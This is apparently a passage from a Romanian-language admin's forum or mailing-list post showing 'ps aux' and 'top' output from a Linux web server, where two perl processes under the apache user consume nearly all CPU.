apache5763 99.9  0.1  4944 3008 ?R03:51 423:32 ssh
root 11415  0.0  0.0  1596  544 ?Ss   Jan18   0:00 syslogd -m 0
root 11425  0.0  0.0  4064 1140 ?Ss   Jan18   0:00 /usr/sbin/sshd
root 11437  0.0  0.0  3780 1012 ?SJan18   0:00 /usr/sbin/vsftpd 
/etc/vsftpd/vsftpd.conf
root 11453  0.0  0.0  7340 1824 ?Ss   Jan18   0:00 sendmail: 
accepting connections
smmsp11462  0.0  0.0  6488 1636 ?Ss   Jan18   0:00 sendmail: Queue 
[EMAIL PROTECTED]:00:00 for /var/spool/clientmqueue
root 11480  0.0  0.3 19748 6372 ?Ss   Jan18   0:00 /usr/sbin/httpd
apache   11487  0.0  0.2 19888 4940 ?SJan18   0:00 /usr/sbin/httpd
apache   11488  0.0  0.2 19992 5324 ?SJan18   0:00 /usr/sbin/httpd
apache   11489  0.0  0.2 19996 5180 ?SJan18   0:00 /usr/sbin/httpd
apache   11490  0.0  0.2 19888 4940 ?SJan18   0:00 /usr/sbin/httpd
apache   11491  0.0  0.2 19868 4632 ?SJan18   0:00 /usr/sbin/httpd
apache   11492  0.0  0.2 19864 4996 ?SJan18   0:00 /usr/sbin/httpd
apache   11493  0.0  0.2 2 5284 ?SJan18   0:00 /usr/sbin/httpd
apache   11494  0.0  0.2 19888 4624 ?SJan18   0:00 /usr/sbin/httpd
apache   22409  0.0  0.1 19748 3712 ?S10:20   0:00 /usr/sbin/httpd
root 23993  0.0  0.0  1856  308 ?Ss   10:26   0:00 vzctl: pts/0
root 23994  0.0  0.0  2216 1276 pts/0Ss   10:26   0:00 -bash
root 25831  0.0  0.0  2372  756 pts/0R+   10:55   0:00 ps aux
apache   30358  0.0  0.2 19888 4612 ?S01:05   0:00 /usr/sbin/httpd


(vezi cele 2 procese de 99%)


[EMAIL PROTECTED] top -b -n1
top - 11:03:12 up 15:50,  0 users,  load average: 2.00, 2.00, 2.00
Tasks:  24 total,   3 running,  19 sleeping,   0 stopped,   2 zombie
Cpu(s): 10.9% us,  1.5% sy,  0.0% ni, 87.6% id,  0.1% wa,  0.0% hi,  0.0% si
Mem:   2067756k total,  2007924k used,59832k free,   211024k buffers
Swap:  2031608k total,   72k used,  2031536k free,   825952k cached

  PID USER  PR  NI  VIRT  RES  SHR S %CPU %MEMTIME+  COMMAND
 5660 apache25   0  4948 3012 1244 R 99.6  0.1 439:43.42 perl
 5763 apache25   0  4944 3008 1248 R 97.6  0.1 431:24.66 perl
1 root  15   0  1692  612  528 S  0.0  0.0   0:00.10 init
 5656 apache16   0 000 Z  0.0  0.0   0:00.00 sh 
 5759 apache16   0 000 Z  0.0  0.0   0:00.00 sh 
11415 root  23   0  1596  544  456 S  0.0  0.0   0:00.02 syslogd
11425 root  20   0  4064 1140  836 S  0.0  0.1   0:00.06 sshd
11437 root  18   0  3780 1012  772 S  0.0  0.0   0:00.00 vsftpd
11453 root  18   0  7340 1824  864 S  0.0  0.1   0:00.01 sendmail
11462 smmsp 15   0  6488 1636  820 S  0.0  0.1   0:00.00 sendmail
11480 root  18   0 19748 6372 3960 S  0.0  0.3   0:00.07 httpd
11487 apache15   0 19888 4940 2352 S  0.0  0.2   0:00.15 httpd
11488 apache15   0 19992 5324 2676 S  0.0  0.3   0:00.13 httpd
11489 apache15   0 19996 5180 2544 S  0.0  0.3   0:00.10 httpd
11490 apache15   0 19888 4940 2352 S  0.0  0.2   0:00.11 httpd
11491 apache18   0 19868 4632 2040 S  0.0  0.2   0:00.11 httpd
11492 apache18   0 19864 4996 2384 S  0.0  0.2   0:00.14 httpd
11493 apache15   0 2 5284 2624 S  0.0  0.3   0:00.14 httpd
11494 apache18   0 19888 4624 2056 S  0.0  0.2   0:00.12 httpd
22409 apache19   0 19748 3712 1260 S  0.0  0.2   0:00.00 httpd
23993 root  15   0  1856  308  208 S  0.0  0.0   0:00.19 vzctl
23994 root  16   0  2216 1276 1052 S  0.0  0.1   0:00.